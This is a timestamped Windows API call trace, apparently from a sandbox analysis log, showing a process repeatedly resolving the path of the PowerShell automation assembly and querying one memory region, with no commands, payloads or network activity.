	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] VirtualQuery (in: lpAddress=0x26bc90, lpBuffer=0x26cb50, dwLength=0x30 | out: lpBuffer=0x26cb50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] VirtualQuery (in: lpAddress=0x26bc90, lpBuffer=0x26cb50, dwLength=0x30 | out: lpBuffer=0x26cb50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.532] VirtualQuery (in: lpAddress=0x26bc90, lpBuffer=0x26cb50, dwLength=0x30 | out: lpBuffer=0x26cb50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.533] VirtualQuery (in: lpAddress=0x26b380, lpBuffer=0x26c240, dwLength=0x30 | out: lpBuffer=0x26c240*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.533] VirtualQuery (in: lpAddress=0x26b410, lpBuffer=0x26c2d0, dwLength=0x30 | out: lpBuffer=0x26c2d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.533] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.533] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.000] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.001] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.002] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.003] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.004] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.004] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.005] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.006] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.006] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.006] VirtualQuery (in: lpAddress=0x26b7c0, lpBuffer=0x26c680, dwLength=0x30 | out: lpBuffer=0x26c680*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.007] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.007] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.007] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.007] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.007] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xf395e626, Data2=0xffda, Data3=0x47aa, Data4=([0]=0xb8, [1]=0x60, [2]=0x41, [3]=0xec, [4]=0xc0, [5]=0xba, [6]=0x4c, [7]=0xf0))) returned 0x0
	[0402.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
